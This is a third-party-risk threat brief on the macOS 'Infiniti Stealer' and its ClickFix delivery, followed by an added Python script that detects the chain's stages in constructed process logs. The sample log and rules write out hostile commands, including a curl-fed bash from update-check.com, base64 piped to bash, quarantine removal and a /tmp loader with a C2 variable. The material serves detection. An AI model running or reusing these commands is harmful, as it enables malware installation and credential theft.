New macOS Infostealer “Infiniti Stealer” Leverages ClickFix Social‑Engineering to Harvest Sensitive Data
What Happened – Malwarebytes discovered a previously undocumented macOS infostealer, now named Infiniti Stealer. It is delivered via a fake CAPTCHA/verification page that tricks users into pasting a malicious command into Terminal (the “ClickFix” technique). The payload is a Python‑based stealer compiled with Nuitka into a native Mach‑O binary, making detection harder.
Why It Matters for TPRM –
- Social‑engineering delivery bypasses many traditional endpoint controls, increasing risk for third‑party vendors that manage macOS workstations.
- The use of a compiled Python binary evades signature‑based scanners, raising the likelihood of successful data exfiltration from partner environments.
- Early‑stage campaigns often expand quickly; vendors should assess exposure before the tool matures.
Who Is Affected – Technology & SaaS providers, MSPs, and any organization that supplies or supports macOS endpoints to employees or customers.
Recommended Actions –
- Review macOS endpoint hardening policies for all third‑party managed devices.
- Block execution of unknown binaries from `/tmp` and enforce strict quarantine attributes.
- Deploy behavioral detection for “ClickFix” command patterns (e.g., `bash <(curl …)` in Terminal).
- Conduct phishing awareness training that includes macOS‑specific social‑engineering scenarios.
Technical Notes – The attack chain starts with a fake Cloudflare‑style verification page (update‑check.com) that serves a base‑64‑encoded curl command. The first stage is a Bash dropper that writes a Nuitka‑compiled Mach‑O loader to /tmp, removes the quarantine flag, and launches it with C2 details passed via environment variables. The loader decompresses a ZSTD archive and runs a Python stealer capable of harvesting credentials, browser data, and files. No CVE is involved; the vector is pure social engineering (ClickFix). Source: Malwarebytes Labs
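The following is an added example, not code from the brief or from Malwarebytes, showing how the “behavioral detection for ClickFix command patterns” recommended above could be expressed as rules over process-execution telemetry, with one rule per stage of the chain described in the technical notes (shell fed from `curl` via process substitution, base64-decoded content piped into a shell, quarantine attribute removed, binary launched from `/tmp` with environment variables prepended). The log line format, the rule names, and the sample commands are all constructed for this example; the only value taken from the brief is the `update-check.com` domain, and the C2 address is a documentation-range placeholder.

```python
import re
from collections import defaultdict

# Constructed sample of process-execution telemetry in a hypothetical line format
# ("<timestamp> user=<u> parent=<parent process> cmd=<command line>"). This is not
# real telemetry and not the export format of any particular EDR product.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z user=alice parent=Terminal cmd=ls -la ~/Documents
2024-01-01T10:02:13Z user=alice parent=Terminal cmd=bash <(curl -fsSL https://update-check.com/v)
2024-01-01T10:02:14Z user=alice parent=bash cmd=echo aGVsbG8= | base64 -d | bash
2024-01-01T10:02:15Z user=alice parent=bash cmd=xattr -d com.apple.quarantine /tmp/loader
2024-01-01T10:02:16Z user=alice parent=bash cmd=C2_HOST=198.51.100.1 /tmp/loader
2024-01-01T10:05:00Z user=bob parent=Terminal cmd=git status
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")

# One rule per stage of the chain in the brief. Rule names are our own labels.
RULES = [
    # Stage 1: the ClickFix paste, a shell fed by process substitution from curl/wget.
    ("curl_process_substitution", re.compile(r"\b(?:bash|sh|zsh)\s+<\(\s*(?:curl|wget)\b")),
    # Stage 1: base64-decoded content piped straight into a shell.
    ("piped_base64_decode", re.compile(r"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:bash|sh|zsh)\b")),
    # Stage 2: the dropper strips the quarantine attribute so Gatekeeper is not consulted.
    ("quarantine_removed", re.compile(r"xattr\s+(?:-d\s+com\.apple\.quarantine|-c)\b")),
    # Stage 2: a binary launched from /tmp, optionally with env vars prepended (C2 details).
    ("exec_from_tmp", re.compile(r"^(?:\w+=\S*\s+)*/(?:private/)?tmp/\S+")),
]

# Any one of these is enough to raise an alert on its own.
HIGH_CONFIDENCE = {"curl_process_substitution"}


def match_rules(cmd):
    """Return the names of every rule that matches a single command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(log_text):
    """Map each user to the sorted list of distinct rule names seen in their commands."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        for name in match_rules(m.group("cmd")):
            hits[m.group("user")].add(name)
    return {user: sorted(names) for user, names in hits.items()}


def flagged_users(log_text, min_signals=2):
    """Users to escalate: a high-confidence rule fired, or several weaker ones did."""
    flagged = []
    for user, names in scan(log_text).items():
        if HIGH_CONFIDENCE.intersection(names) or len(names) >= min_signals:
            flagged.append(user)
    return sorted(flagged)


if __name__ == "__main__":
    for user, names in scan(SAMPLE_LOG).items():
        print(f"{user}: {', '.join(names)}")
    print("flagged:", flagged_users(SAMPLE_LOG))
```

The weaker rules (`exec_from_tmp`, `quarantine_removed`) are deliberately not alerting on their own, since build tools and installers legitimately touch `/tmp` and `xattr`; they become meaningful when several fire for the same user in a short span, which is what the `min_signals` threshold captures. In a real deployment the parser would be replaced by the EDR's own process-event schema, and the per-user aggregation bounded by a time window.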